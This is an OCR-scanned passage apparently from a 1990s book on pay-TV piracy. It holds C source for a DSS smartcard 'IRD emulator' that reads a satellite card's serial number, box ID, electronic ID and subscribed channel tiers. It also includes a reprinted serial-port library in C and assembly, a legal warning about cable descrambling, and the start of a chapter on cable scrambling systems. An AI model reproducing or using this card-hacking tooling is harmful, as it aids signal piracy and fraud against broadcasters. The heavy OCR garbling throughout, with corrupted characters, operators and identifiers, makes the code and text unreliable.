if (reset answer[0] == 0x3f) inverse(&c, 1); 
AsyncOut(c) ; 
while (AsyncInStat() == 0); 
AsyncIn(); 
wait us(delus[0]); 
} 
return 0; 
} 
/% 


* Get all bytes available from serial port FIFO and return how many 
* bytes were available. 


ж 
/ 
int receive(char “дата, int max) 
{ 
inti=0; 
while (AsyncInStat() > 0 && i < max) 
data[i++] =AsyncIn(); 
if (reset answer[0] == 0x3f) inverse(data, i); 
return i; 
} 
f* 


* Get n bytes from serial port FIFO. Don't wait more than timeout 
* microseconds and return how many bytes were avai lable. 
%4 


int receive timeout(char “дата, int п, long timeout) 
{ 
inti=0; 
while (i < п && timeout > 0) 
if (AsyncInStat() > 0) 
data[i++] =AsyncIn(); 
else { 


, 
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if (reset. answer[0] == Ox3f) inverse(data, i); 
returni; 

) 

/* 

* Performa card reset. Try up to 10 times. 

* 

* Return value: 0 correct answer to reset received 
* -1 reset failed 

*/ 

int reset(void) 


int fail_count =0; 
int y, p, i, err, tck_expected; 
int parity; 
reset length = 0; 
AsyncClear(); 
while (fail count < 10) { 
AsyncHand(DTR | RTS); /* reset low */ 
wait us(13000L); /* wait initial CLK cycles */ 
AsyncClear(); 
AsyncHand(DTR) ; /* reset high */ 
wait. us(13000L) ; /* wait for answer */ 
/* Read TS */ 
if (AsyncInStat() !=0) { 
reset. answer [0] = AsyncInO ; 
if (reset answer[0] !- Ox3b) 
inverse(reset answer, 1); 
if (reset. answer[0] == 0х3Ғ || reset answer[0] == Ox3b) { 
if (AsyncInStat() « 1) wait. us(1000000L) ; 


/* Read TO */ 
if (receive(reset answer +1, 1) == 1) ( 
tck expected = 0; 
err=0; 
р-2; /* number of bytes read so far */ 


/* Read TA i, TB. i, TC i, TD_i */ 
У = reset_answer[p - 1] > 4; 
while (!err && y & 
p < RESET ANSWER. MAX - 5 - (reset answer[1] &15)) { 


for (i20; lerr&&i«4; i++) ( 
if ((y>i)&1){ 
if (AsyncInStat() < 1) wait. us(1000000L) ; 
err |= receive(reset. answer +p, 1) !- 1; 
if (1 == 3) { 
tck expected |= (reset_answer[p] & 15) != 0; 
У = reset_answer[p] > 4; 


} 


) else 
if Ci ==3) y=0; 
} 


p++; 
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} 


/* historic characters */ 
if Clerr) { 
if (AsyncInStat() < (reset. answer[1] & 15)) wait us(1000000L) ; 
err |= receive(reset answer +p, reset answer[1] &15) != (re- 
set answer[1] & 15); 
} 
р += (reset_answer[1] & 15); 


/* TCK */ 

if (!err && tck. expected) { 

if (AsyncInStat() < 1) wait us(1000000L) ; 
err |= receive(reset answer +p, 1) !- 1; 
pet; 
y=0; 

for (i =1; i<p; i++) 
y A= reset_answer[i]; 


err |=y !=0; 
} 
/* everything was fine */ 
if Crerr) { 


reset_length =p; 
parity = (reset answer[0] == 0x3f) ? ODD. PARITY : EVEN. PARITY; 
if (C(reset_answer[1] & 0x10) != 044 reset answer[2] == 0x31) 
/* we can't double CLK freq. , but we can reduce baud rate */ 
AsyncSet(4800, BITS. 8 | STOP. 2 | parity); 


else 
AsyncSet(9600, BITS. 8 | STOP. 2 | parity); 
return 0; 
} 
} 
} 
} 
fail_count++; 
} 
AsyncHand(DTR | RTS); /* reset low */ 
return -1; 
} 
/* 


* send a command (T=0 protocol) to the card and send/receice data. 
* 
* Return value: 0 command succeded 
* -1 command failed 
xf 
int command(int instruction, unsigned char *data, 
int length, int direction) 
{ 


char pb; /* procedure byte */ 
char sw2; 

іпсі-0,); 

АѕупсС1еаг() ; 
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length & Oxff; 
instruction & Oxfe; 
if (Cinstruction & 0хҒ0) == 0x60 || (instruction & OxfO) == 0x90 | | 
Cinstruction &1) !=0) 
return -1; 
header [0] = 0x48; 
header [1] = instruction; 
header [2] = 0x00; 
header [3] = 0x00; 
header [4] = length; 
if (length == 0 && direction == IN) length = 256; 
send(header, 4); 
header[0] = length; 
send(header, 1); 
do { 
do { 
if (receive. timeout(&pb, 1, 2 * SECOND) !=1) { 
fprintf(stderr, “procedure byte timeout, Xd data bytes so far.\n”, i); 
return -1; 


} 
} while (pb == 0x60); 
if (C(pb ^ instruction) 4 Oxfe) == 0) { 
if (direction == OUT) { 
for (; i < length; i++) { send((char *) data + i, 1); }} 
else 
for (; i « length; i++) { 
if (receive timeout((char *) дата + 1, 1, 2 * SECOND) !=1) { 
fprintf(stderr, "data byte timeout, Xd data bytes so far.\n”, i); 
return -1; 


} 
} else if (((pb^ instruction) & Oxfe) == Oxfe) { 
if (direction == OUT) 
send((char *) data + i, 1); 
else if (receive timeout((char *) data + 1, 1, 2 * SECOND) !=1) ( 
fprintf(stderr, "data byte timeout, Xd data bytes so Ғаг.\п", i); 
return -1; 


i++; 
}else { 
if ((pb & Oxf0) == 0x60 | | (pb & Oxf0) == 0x90) { 
if (receive timeout(&sw2, 1, 2 * SECOND)) 
fprintf(stderr, “SW2 timeout.\n”); 
printf(“Sw1 SW2 = X02x %02х, Xd data bytes so far.n", 
(unsigned char) pb, (unsigned char) sw2, i); 
}else 
printf(“illegal procedure byte %02x, " 
“%d data bytes so far.\n", (unsigned char) pb, i); 


} 


return -1; 
} while (i < length); 


/* final procedure bytes */ 
do { 
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if (receive. timeout(&pb, 1, 2 * SECOND) !=1) { 
fprintf(stderr, "final procedure byte timeout.Nn"); 
return -1; 


H 

} while (pb == 0x60) ; 
if ((pb & Oxf0) == 0x60 | | (pb & Oxf0) == 0x90) 
if (receive timeout(&sw2, 1, 2 * SECOND) !=1) ( 
fprintf(stderr, “SW2 timeout.Nn"); 


return -1; 
} 
if (Cunsigned char) pb != 0x90 | | sw2 !=00) { 
printf(“SW1 SW2 = %02x %02x.\n”, (unsigned char) pb, 
(unsigned char) sw2) ; 
return -1; 
} 
return 0; 


main(int argc, char **argv) 


int com=1; 

inti, j,k, с; 

unsigned char serial [6]; 

cirscrO; 

for (i=0;1<76; i++) printf("*"); printf("Nn"); 
printf("Nn DecoEm -- DSS IRD Emulator V1.0 CLA=48 Nn") ; 
printf(" Based On DECOEM.C (c) 1994 Markus Kuhn Аа”); 
printf(" DSS Routines (c) 1996 Peter Pan\n\n") ; 
printf(“ Run with option -h to get һе1р.\п"); 
printf(" Usage: ‘DIREC n’ where п 15 the Com Port \п\п”); 
for (i=0; 1<76; i++) printf("*"); printf("Nn"); 


for (1 = 1; i <argc; i++) { 
if Cisdigit(argv[i][0])) 
com = atoi(argv[i]); 
else 
for (j =0; j «999 && argv[i] [j]; j++) 
switch(argv[iJ][j]) { 
case 'w': 
case 'W': 
/* 
* modify delay table, e.g. option wa200 waits 200 us after each 
* byte because this sets delus['a' - 'a'] = 200. 


* 
/ 
k = tolower(argv[i][j41]) - ‘a’; 
if (k <0 || k >= DELAYS || !isdigit(argvli][j+2])) { 
printf("Only wait options between wa<ticks> апа " 
"wXc«ticks» possible.\n", ‘a’ + DELAYS - 1); 
exit(1); 
} 
j+=2; 


delus[k] = atol(argv[i] + j); 
while (isdigit(argv[i][j+1])) j++; 
break; 
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case 'h': 

case 'H': 
printf(“\n This is а DSS IRD Emulator program that uses the serial Xn"); 
printf(" port and a Phoenix type interface to read information from An"); 
printf(" а 055 Issue 01 card. \n\n"); 
printf(" The information read from the card is the serial number, Nn"); 
printf(" the fuse settings, the Box ID and the Electronic ID of the 4n"); 
printf(" card. It а150 м111 show the channel tiers that the card is іп”); 
printf(" subscribed to and the relevant expiry dates. \n\n"); 
printf(" At present the knowledge of the package to channel tier Xn"); 
printf(" correlation is limited.\n\n"); 

exit(0); 

default: 
break; 


) 


fprintf(stderr, "Using serial port COMXd, byte delay Xlu \xe6s.\n\n”, 
com, delus[0]) ; 


activate com(com); 


if (atexit(deactivate_com)) fprintf(stderr, "Can't call atexit()! Nn"); 
printf("RESET Xn"); 
if (геѕет()) { 
fprintf(stderr, "card reset failed.\n"); 
exit(1); 


for (i20; 1 «reset. length; i++) 
ргіпеҒ(“%02х%с", (unsigned char) reset_answer[i], 
(Ci &15)==15) ? ‘\п':''); 


printf("NnSwitching To 38K4 Baud For Data Transfer\n”) ; 
AsyncSet (38400, BITS_8 | STOP. 2 | ODD. PARITY) ; 


/* Commands Sections */ 
for (i=0;1<76; i++) printf("*"); printf("Nn"); 
printf(“\n Command 0x58 - Get Fuse Information Ап”); 
if (command(0x58, msg, 0x17, IN)) 
1 
fprintf(stderr, "Command 58 failed. Xn"); 
exit(1); 
) 
printf(“\nResult Of 58 Command: Nn") ; 
for (i=0; 1<Oxc; i++) printf(" %02Х”, msg[i]); printf("n"); 
for (i=0xc; 1<0x18; i++) printf(" %02Х”, msg[i]); 
printf("Nn"5; 
printf("Xn Command 0х2а Read Card Information”); 
if (command(0x2a, msg2, 0x77, IN)) 
{ 
fprintf(stderr, “Command 2A failed. Xn"); 
exit(1); 


} 
printf(“\nResult Of 2A Command: \п") ; 
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for (i=0;1<0x10; i++) printf(" %02Х”, тѕ92[1]); printf("“\n"); 

for (i=0x10; 1<0x20; i++) printf(" %02Х", msg2[i]); printf("Nn"); 
for (i=0x20; 1<0x30; i++) ргіпеҒ(“ %02Х”, msg2[i]) ; printf("\n"); 
for (i=0x30; 1<0x40; i++) ргіпеҒ(“ X02X", msg2(i]); printf("\n"); 
for (i=0x40; 1<0x50; i++) printf(" %02Х", msg2[i]) ; printf("Nn"); 
for (i=0x60; 1<0x70; i++) printf(" %02Х", msg2[i]) ; printf("\n"); 
for (i=0x70; 1<0x77; i++) printf(" %02Х", msg2[i]); printf("Nn"); 

printf("\n"); 


printf("Fuse Settings - %02X, %02x", msg[0], msg[12]); 
printf(“\n\n"); 


for (i=0;1<76; i++) printf("-"); printf("Nn"); 
printf("- Card Serial Number - Ап”); printf("Hexadecimal Format: "); 
for (i24; 1<12;1++) 
( printf(" X02x", тѕ92[1]);} 
printf(“\nDecimal Format: "); 
serial[1]=msg2[12]; 
serial [2]=тѕ92 [13]; 
serial [3]=msg2[14]; 
serial [4]=msg2[15]; 
ѕегіа1 [5]=тѕ92 [16]; 


printf(“ %071и”, (Cunsigned long) seria1[1]«24) 

| CCunsigned long) ѕегіа1[2]<16) | (Cunsigned long) serial[3]<8) | 
(Cunsigned long) serial[4])); 

printf("\n"); 


for (i=0; 1<76; i++) printf("-"); printfC"\n"); 
printf("- Electronic ID -\n"); 

Ғоғ(1-12; 1<27; i++) printf С" X02X", msg2Li]); 
printf(“\n\n"); 


for (i=0;1<76; i++) printf("-"); printf("\n"); 
printf("- IRD Box ID Number -n") ; 


for (i=27; i«31; i++) printf(“ %02Х", msg2[i] ^ msg2[i-15]) ; printf(“\n”); 


for(i=31; і<42; i++) printf (" %02Х", msg2[i]); printf("Nn"); 
for (i=42; 1<55; i++) printf (“ %02Х", msg2[i]); printfC"\n"); 
printf("Nn"); 


for (i=0;1<76;i++) printf("-"); printf("Nn"); 


printf("- Channel IDs & Expiry Months -\n"); 
for(i=55; i«71; i++) printf(" X02X" , msg2[i]); printf(“\n"); 
for(i=71; 1«87; i++) printf(" %02Х", msg2[i]); ргіпеҒ(“Ха”); 
for (i=87; 1«103; i++) ргіпеҒ(“ %02Х”, msg2[i]); ргіпеҒ(4,5"; 
Ғог(1=103; 1<119; i++) printf(" X02X", msg2[i1]) ; ргіпе 1"); 
printf(“\n"); 


for (i=0;1<76; i++) printf("-"); printf("\n"); 


printf(" Expiry Dates: 0x32 = March 1996, 0х33-Арг11 1996 etc. \n"); 
Ғог(1=55;1<116;1+=4){ 
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ргіпеҒ(“ Channel Tier: %02X %02Х”, msg2[i], msg2[i+1]); 
printf(" Expires: Month %02Х ", msg2[i+2]); 
printf(" Day %02u An ", 
((msg2[i] & Oxf0) & (msg2[i+3] & Oxf0)) ^ (msg2[i+3] & Ox0F)); 
} 


return 0; 


This is a set of rather simple serial communication routines written in 
assembly, and to be called from C. If it is not stated elsewhere, this code is 
public domain! Do with it as you wish, put it in your programs, etc, etc. 


This is the second ‘release’ of the ASYNC functions. Since the first release 
several people have contributed modifications to the routines, to which | 


want to give them thanks and some credit where credit is due. 
Roy M. Silvernail -- roy%cybrspc@cs.umn.edu - OR- cybrspc! roy@cs.umn.edu 


For clarifying the documentation of AsyncHand() and AsyncSet(). He added 
a few #define’s to further clarify AsyncSet(). He also is responsible for 
adding some error checking to Asynclnit()-- it now returns a non-zero on 
error (when the COM port isnt there). 

Steve Miller - uunet!pictel!miller 

For finding a rather obscure bug. If a character was recieved and sent at 
exactly the same time, then it would stop receiving or sending characters. 


Thanks again. 


In addition, the buffer size has been increased from 1024 to 8196 
characters. 


Here is a list of all the files included in this package: 
async.doc - What you are reading. 


async.h - The C prototypes/header file 

async.asm - The assembly source 

term.c - The source for a simple terminal program 
asyncs.obj - The .obj async.asm file for the SMALL model 
asyncc.obj - The .obj for the COMPACT model 

asyncm.obj - The .obj for the MEDIUM model 

asyncl.obj - The .obj for the LARGE model 

term.exe - The executable for the terminal program 


| have used these with Turbo C, and Turbo ASM without any problems. It 
should work with Microsoft C and ASM, but a bit of re-writing will be needed 
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to make the assmebler part work. | have also used it with Turbo C++ and 
Turbo Assembler 2.0 without any problem, but you will have to treat the 
Async functions as standard C, rather than C++. 


Here is a short tutorial of the Async functions: 

AsyncInit( int Port) 

AsyncStop( void) 

These functions start and stop the interrupt handlers. No characters can be 
recieved if it isn’t started, and the computer will crash if they are not stopped 
before the program is exited. The paramater ‘port’ is the COM port to use, 
there are #defines in the header file that defines the values to be used. It 
would be ‘more bug proof if AsyncStop was called via the atexit() function 
(check your compiler manual). 


Asyncinit() will return a non-zero value upon an error (when the COM port is 
not there). 


AsyncClear( void) 
Clears the internal buffers. 


AsyncOut( int c) 
Sends out a character. 


AsyncIn( void) 


Returns the next character in the buffer or a NULL upon an empty buffer. 
Use AsynclnStat() to check for the number of characters іп the buffer. 
AsyncHand( int handshake) 


Sets the status of the handshaking lines. The values are defined in the 

header file and can be or'd together. A typical call would look like this: 
AsyncHand( DTR | RTS); 

Roy M. Silvernail found confusion in this rather simple explanation of 

AsyncHand(). | thought of editing the above description, but his description 

is better than mine, so here it is: 


“The AsyncHand routine wants the whole set of flags upon invocation. At 
first, | had tried AsyncHand(~DTR) to drop DTR, but soon found it didn't 
work. With the 2 main control bits being DTR and RTS, AsyncHand(RTS) 
drops DTR just fine, and (of course) AsyncHand(DTR | RTS) raises it once 
again.” 


AsyncSet( int Baud, int Control) 


This sets the baud rate, parity, etc, of the serial line. The parameter 'Baud'is 
the baud rate (ie 1200, 2400, 9600, etc), and 'control' is a number that 
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represents parity, length and stop bits. There are defines for this in 
ASYNC.H, but here are a few commonly used examples: 


AsyncSet( 2400, BITS. 8 | STOP. 1 | NO PARITY ) for 2400 baud 8N1. 
AsyncSet( 9600, BITS. 7 | STOP. 1 | EVEN. PARITY) for 9600 baud 7Е1. 
AsyncInStat( void) 


This function returns the number of characters in the input buffer. 


AsyncOutStat( void) 


Returns the number of characters in the output buffer. 
AsyncStat( void) 


Returns the status of the handshaking lines. Use the & and | oporaters with 
the values defined in the header file to extract any useful informaton out of 
this value. 


ASYNC.H 


#1 fndef _ASYNC_H_ 

#define_ASYNC_H_ 

int AsyncInit( int Port); 

void AsyncStop( void), 
AsyncClear( void), 
AsyncOut( int с), 
AsyncHand( int handshake), 
AsyncSet( int Baud, int Control); 

int AsyncIn( void), 
AsyncInStat( void), 
AsyncOutStat( void); 


unsigned AsyncStat( void); 
#defineCOM1 0 
#defineCOM2 1 
#defineCOM3 2 
#defineCOM4 3 


/* Defines for Com Port Parameters, the second parameter to AsyncSet() */ 


#define BITS_8 0x03 
#define BITS_7 0x02 
#define STOP_1 0x00 
#define STOP_2 0x04 
#define EVEN_PARITY 0x18 
#define ODD. PARITY 0x08 
#define NO_PARITY 0x00 


/* Defines for AsyncHand() */ 


#defineDTR 0x01 
#defineRTS 0x02 
#defineUSER 0x04 
#define LOOPBACK 0x10 
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/* Defines for AsyncStat() */ 
#defineD_CTS 0x0100 
#defineD_DSR 0x0200 
#defineD_RI 0x0400 
#defineD_DCD 0x0800 
#defineCTS 0x1000 


#defineDSR 0x2000 
#defineRI 0x4000 
#defineDCD 0x8000 
#definePARITY 0x0004 
#define THREMPTY 0x0020 
#define BREAKDET 0x1000 
#endif 
ASYNC.ASM 


; interrupt driven serial port 1/0 module. 
; written by David Kessner 
; modified for MASM 5.1 compatibility on 1994-04-11 by WK 


EOI equ 020h ; 8259 end-of-interupt 
Ctr18259_0 equ 020h ; 8259 port 

Ctr18259_1 equ 021h ; 8259 port (Masks) 
BufSize equ 8196 ; Buffer Size 


—DATA SEGMENT WORD PUBLIC ‘DATA’ 
assume cs:DGROUP, ds:DGROUP, ss:DGROUP 


; Various things to be set upon AsyncInit() 


VectorNum db ? ; Vector Number 

EnableIRQ db ? ; Mask to enable 8259 IRQ 
DisableIRQ db ? ; Mask to disable 8259 IRQ 
VectorSeg dw ? ; Old Vector Segment 

VectorOfs dw ? ; Old Vector Offset 


; Register Addresses for the 8250 UART 


Port dw 2 ; Port Base Address 

RegStart LABEL WORD 

THR dw ? ; Transmitter Holding Register 

RDR dw ? ; Receiver Data Register 

BRDL dw ? ; Baud Rate Divisor, Low byte 
BRDH dw ? ; Baud Rate Divisor, High Byte 
IER dw ? ; Interupt Enable Register 
IIR dw ? ; Interupt Identification Register 
LCR dw ? ; Line Control Register 

MCR dw ? ; Modem Control Register 

LSR dw ? ; Line Status Register 

MSR dw ? ; Modem Status Register 


; Buffer Data 
RecBuffer 


Qa 
с 


BufSize DUP (7) ; Recieve Buffer 
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RecHead dw ? ; Buffer Head Pointer 

RecTail dw T ; Buffer Tail Pointer 
TransBuffer db BufSize DUP (?) ; Transmit Buffer 
TransHead dw ? ; Buffer Head Pointer 


TransTail dw ? ; Buffer Tail Pointer 


; Register Offsets for the UART 

RegOffsets dw 0,0,0,1,1,2,3,4,5,6 

—DATA ENDS 

—TEXT SEGMENT WORD PUBLIC ‘CODE’ 

assume cs:_TEXT, ds:DGROUP, ss:DGROUP 
PUBLIC _AsyncInit, -AsyncClear, _АѕупсЅтор 
PUBLIC .AsyncIn, -AsyncOut, -AsyncSet 
PUBLIC _AsyncHand, -AsyncStat, _AsyncInStat 
PUBLIC _AsyncOutStat 


AsyncClear Empty the receive buffer 


void AsyncClear( void) 


_AsyncClear PROC NEAR 


cli 

push ax 

mov ax, offset RecBuffer 
mov [RecHead], ax 

mov [RecTail], ax 

mov ax, offset TransBuffer 
mov [TransHead], ax 

mov [TransTail], ax 

pop ax 

sti 

ret 


_AsyncClear ENDP 


void AsyncInit( int port) 


р Where Port is 

; 0 = СОМ1 
; 1 = СОМ2 
б 2 = COM3 
j 3 = COM4 


—AsyncInit PROC NEAR 

CommPort equ bp+4 
push bp 
mov bp, sp 

і---- Set various things according to com port number 
mov ax, [CommPort] 

із---- COM1 
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cmp ax, 0 
jne _АѕупсІпіт_1 
mov [Port], 03F8h 
mov [VectorNum] , OCh 
mov [EnableIRQ], OEFh 
mov [DisableIRQ], 10h 
jmp -AsyncInit. Done 


—AsyncInit. 1: 
і----- COM2 
cmp ax,1 
jne AsyncInit 2 
mov [Port], 02F8h 
mov (VectorNum] , OBh 
mov [EnableIRQ], 0F7h 
mov [DisableIRQ], 08h 
jmp _AsyncInit_Done 


—AsyncInit 2: 


і----- COM3 
cmp ax,2 :2 
jne _AsyncInit_3 
mov [Port], 03E8h ; 03Е8 
mov [VectorNum] , ОСһ ; 0C 
mov [EnableIRQ], OEFh ; EF 
mov [DisableIRQ], 10h ; 10 


jmp -AsyncInit. Done 


—AsyncInit. 3: 


фт---- COM4 
mov [Port], 02E8h ; 02Е8 
mov [VectorNum], OBh ; OB 
mov [EnableIRQ], OF7h БЕТ 
тоу [DisableIRQ], 08h ; 08 


-AsyncInit. Done: 
;---- Compute Register locations 


mov cx, 10 
mov bx, offset RegOffsets 
push di 


mov di, offset RegStart 


-AsyncInit. 4: 


mov ax, [bx] 
add ax, [Port] 
mov [di], ax 
add bx,2 
add di,2 

loop AsyncInit. 4 
pop di 


і----- Initalize Buffer 
call _AsyncClear 

;--- Save and reassign interrupt vector 
push ds ; Save Old Vector 
mov al, [VectorNum] 
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mov ah,35h 


int 21h 

mov [VectorSeg], es 

mov [VectorOfs], bx 

mov al, [VectorNum] 

push cs ; Set New Vector 
pop ds 


mov dx, offset AsyncISR 
mov ah, 25h 


int 21h 
pop ds 

і----- Enable 8259 interrupt (IRQ) line for this async adapter 
in al, Ctr18259_1 


and al, [EnableIRQ] 
out Ctr18259_1, al 
і----- Enable 8250 Interrupt-on-data-ready 


mov dx, [LCR] ; Read Line control register and clear 
in al, dx ; bit 7, the Divisor Latch Address 

and al, 07Fh 

out dx, al 


mov dx, [IER] 
mov al, 0; ме” ге gonna test the UART first 
out dx, al 
inal, dx ; if this isn’t 0, there's по UART 
cmp al, 0 
jnz _AsyncInit_222 
mov al, 3 
out dx, al 
і----- Clear 8250 Status and data registers 


-AsyncInit. 10: 


mov dx, [RDR] ; Clear RDR by reading port 
in al, dx 

mov dx, [LSR] ; Clear LSR 

in al, dx 

mov dx, [MSR] ; Clear MSR 

in al, dx 

mov dx, [IIR] ; Clear IIR 

in al, dx 


test а1,1 

jz -AsyncInit 10 

і----- Set Bit 3 of MCR -- Enable interupts 
mov dx, [MCR] 


in al, dx 
or al, 08h 
out dx, al 


і---- Clear Buffer Just in case 
call _AsyncClear 
posses Return 
xor ax, ax 


—-AsyncInit. 222: 


pop bp 
ret 
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_AsyncInit ENDP 


: AsyncStop Uninstall ISR 
; void AsyncStop( void) 


“AsyncStop PROC NEAR 


push bp 
mov bp, sp 
із---- Mask (disable) 8259 IRQ Interrupt 
in al, Ctr18259 1 
or al, [DisableIRQ] 


out Ctr18259 1, al 
і----- Disable 8250 interrupt 
mov dx, [LCR] 


in al, dx 
and al, 07Fh 
out dx, al 
mov dx, [IER] 
xor al, al 
out dx, al 


і----- Set bit 3 іп МСК to 0 
mov dx, [MCR] 


іп al, dx 
and al, OF7h 
out dx, al 
і---- Interrupts are disables. Restore saved interrupt vector. 
push ds 
mov al, [VectorNum] 


mov ah, 25h 
mov dx, [VectorOfs] 
mov ds, [VectorSeg] 


int 21h 

pop ds 
шашы Return 

pop bp 

ret 


_AsyncStop ENDP 


; AsyncISR Async Interrupt Service Routine 
Н То be called only as ап interrupt. 


push ax ; Save Registers 


push bx 

push ds 

push dx 

mov ax, @data ; Address local datawith ds 

mov ds, ax 

mov dx, [IIR] ; Check if data actually received 
in al, dx 

and al, 06h 
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cmp al, 04h 
je AsyncISR_recieve 
cmp al, 02h 
jne AsyncISR_end 
і----- Transmit А byte 
AsyncISR_transmit: 
mov bx, [TransTail] 
cmp bx, [TransHead] 
jne AsyncISR 1 


mov dx, [IER] ; Buffer empty 
mov al, 1 
out dx, al ; Disable THR empty interrupt 
jmp AsyncISR end 
AsyncISR 1: 
mov al, byte ptr [bx] ; Get Byte 
inc [TransTai1] ; Update buffer pointer 
cmp [word ptr TransTail], offset TransBuffer + BufSize 
jb AsyncISR 2 
mov [TransTail], offset TransBuffer 
AsyncISR 2: 
mov dx, [THR] 
out dx, al 
jmp AsyncISR end 
із---- Recieve а byte 
AsyncISR_recieve: 
mov dx, [RDR] ; Get Byte 
іп al, dx 
mov bx, [RecHead] ; Store Byte in buffer 
mov byte ptr [bx], al 
inc bx ; Update RecHead 


cmp bx, offset RecBuffer + BufSize 
jb AsyncISR_10 


mov bx, offset RecBuffer 
AsyncISR 10: 

cmp bx, [RecTail] 
jne AsyncISR 20 

mov bx, [RecHead]  ; Cancel Pointer advance on overflow 
AsyncISR 20: 

mov [RecHead] , bx ; Store new pointer 
AsyncISR end: 

mov al, EOI ; Signal end ot interrupt 


out Ctr18259. 0, al 
; Disable and re-enable interrupts so that there 
; is an interrupt edge. 

mov dx, [IER] ; Point to Interrupt Enable Register. 

inal,dx ; Read the current value. 

push ax ; Save it. 

mov a1,0 ; Disable the interrupts. 

out dx, al 

pop ax ; Restore original mask. 

out dx,al ; Re-enable interrupts. 

pop dx ; Restore saved registers. 

pop ds 

pop bx 
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pop ax 
ігес 
AsyncISR ЕМОР 


» AsyncIn Gets а byte from the input buffer 
Ч int AsyncIn( void) 


'AsyncIn PROC NEAR 


push bp 

mov bp, sp 

xor ax, ax ; Pre-Set result to 0 
mov bx, [RecTai1] 


cmp bx, [RecHead] 
je -AsyncIn return 
mov al, byte ptr [bx] 


inc [RecTai1] 

cmp [word ptr RecTail], offset RecBuffer + BufSize 
jb AsyncIn return 

mov [RecTai1], offset RecBuffer 
-AsyncIn. return: 

pop bp 

ret 


—AsyncIn ENDP 


; AsyncOut Output a byte 
$ void AsyncOut( int c) 


_AsyncOut PROC NEAR 


push bp 
mov bp,sp 
mov ax, [bp«4] ; get argument 
mov bx, [TransHead] 
mov cx, bx 
inc cx ; Compute NEW buffer position 
cmp cx, offset TransBuffer + BufSize 
jb _AsyncIn_1 
mov cx, offset TransBuffer 
-AsyncIn 1: 
cmp cx, [TransTail] ; Wait for space in buffer 
је AsyncIn. 1 
mov byte ptr [bx], a1 ; Add byte to buffer 
mov [TransHead], cx ; Update pointer 
mov dx, [IER] ; Enable THR empty interrupt 
mov al,3 
out dx, al 
pop bp 
ret 


—AsyncOut ENDP 
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; AsyncSet 


Set communication paramaters 


void AsyncSet( int Baud, int Control) 
Baud = 150, 300, 600, 1200, 2400, 4800, 9600, 19200, 28800, 38400, 57600 
У Control = The valure to p! ace in the LCR 


—AsyncSet PROC NEAR 
Baud equ bp+4 
Control equ bp+6 


push bp 

mov bp, sp 
mov bx, [Baud] 
cmp bx, 0 


je _AsyncSet_abort 
mov ax, 0C200h 
mov dx, 0001h 


div bx 
mov cx, ax 
cli 


mov dx, [LCR] 
mov al, Offh 


out dx, al 

mov dx, [BRDL] 

mov al, c1 

out dx, al 

mov dx, [BRDH] 

mov al, ch 

out dx, al 

mov dx, [LCR] 

mov ax, [Control] 

and al, 07Fh 

out dx, al 

sti 
_AsyncSet_abort: 

pop bp 

ret 


_AsyncSet ENDP 


AsyncInStat 


урса ЗЕЕ PROC NEAR 


push bp 

mov bp, sp 

mov ax, [RecHead] 

sub ax, [RecTai1] 
jge -AsyncInStat 10 

add ax, BufSize 
-AsyncInStat. 10: 

pop bp 

ret 


; Baud rate divisor = 115200 / Baud 
; 115200 - 0001C200h 


; Set Port Toggle to BRDL/BRDH registers 


; Set Baud Rate 


; Set LCR and Port Toggle 


Returns the # of characters in buffer 


int AsyncInStat( void) 
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-AsyncInStat ENDP 


Н AsyncOutStat Returns the # of characters in buffer 
i int AsyncOutStat ( void) 


_AsyncOutStat PROC NEAR 


push bp 

mov bp, sp 

mov ax, [TransHead] 
sub ax, [TransTail] 


jge .AsyncOutStat 10 

add ax, BufSize 
-AsyncOutStat 10: 

pop bp 

ret 
_AsyncOutStat ENDP 


AsyncHand Sets various handshaking lines 
void AsyncHand( int Hand) 


_AsyncHand PROC NEAR 
Hand equ bp+4 


push bp 

mov bp, sp 

mov dx, [MCR] 

mov ax, [Hand] 

or al, 08h ; Keep interrupt enable ON 
out dx, al 

pop bp 

ret 


_AsyncHand ЕМОР 


: AsyncStat Returns Async/Modem status 
2 unsigned AsyncStat( void) 
2 MSR is returned іп the high byte, LSR in the low byte 


AsyncStat PROC NEAR 


push bp 
mov bp, sp 
mov dx, [MSR] 
in al, dx 
mov cl,al 
mov dx, [LSR] 
in al, dx ; LSR in low byte 
mov ah, c1 ; MSR in high byte 
pop bp 
ret 
_AsyncStat ENDP 
-ТЕХТ ENDS 
END 
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Warning 


Under the Irish Broadcast Act 1990 is illegal to operate MMDS 
downconverters on an MMDS net without permission of the net 
owner, It is an offence to manufacture, sell or install pirate cable or 
MMDS descramblers. 


The fines under the 1990 Broadcast are significant. The first offence 
of pirating a signal whether by cable or MMDS is punishable by a 
fine of up to £1000 and or up to three months in prison. Distributing 
pirate descramblers or engaging in any form of organised piracy is 
punishable by fines of up to £20000 and up to two years in prison. 


In the UK, piracy of cable television signals is an offence under the 
relevant laws. In most European countries, legislation to protect 
cablenets exists. Due to the localised nature of a cablenet, the cable 
company are going to find out about any piracy sooner or later. The 
chances of being caught are high. If a company does not know about 
a hacker, there is always the possibility that some nasty neighbour 
will inform on him. 


Clearly, I am not advocating that the reader should use this 
information to defraud a cable or MMDS company. This information 
is presented for educational purposes only. If you decide to misuse 
this information, consider this question; how do you know that the 
cable or MMDS operator hasn’t already read a copy of this book and 
is therefore ready and waiting? 
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Section 1: Cable Scrambling Systems 


The gulf between satellite based scrambling systems and cable based 
scrambling systems has narrowed dramatically. This is due mainly to the 
relatively low cost digital options now available to designers. Another more 
pressing factor here is that the systems developed today are aimed at both 
cable television and satellite television markets. A good system should 
therefore be usable in both applications. 


The dual usage can be seen clearly with systems like Syster and 
Cryptovision. The Syster system is intended to replace the Canal Plus 
Discret system terrestrially and it is also used on satellite by Canal Plus. The 
Cryptovision is widely used in Ireland and Scandinavia on cablenets and is 
currently used by SSVC on satellite. 


However these systems represent the high end of the market. The numbers 
of subscribers on networks using these scrambling systems number in the 
hundreds of thousands. The smaller networks are forced to settle for the 
cheaper options and the questionable protection of any anti-piracy legisla- 
tion that may be available in that country. 


The one factor that works in the favour of the smaller networks is variety. 
With a number of different scrambling systems in operation, the risk of 
piracy will diminish according to the number of subscribers on the network. 
Therefore if the network has only a few thousand subscribers then a low 
cost system may be enough. After all, the cable technicians will get to hear 
of anyone making pirate decoders sooner or later. Perhaps it could be 
described as means, motive and opportunity. 


The last few years of abject piracy on satellite television channels has 
created thousands of technically competent hackers. In Europe, the 
information on the cable scrambling systems was hard to obtain but now it is 
readily available in books, magazines, BBSes and оп the internet. The 
majority of the cable systems have been hacked and are considered little 
more that training runs before the hacker moves on to hacking satellite 
systems. 


Many cablenet managers consider that most people are honest and will not 
set out to use a pirate descrambler on a cablenet. | would tend to agree with 
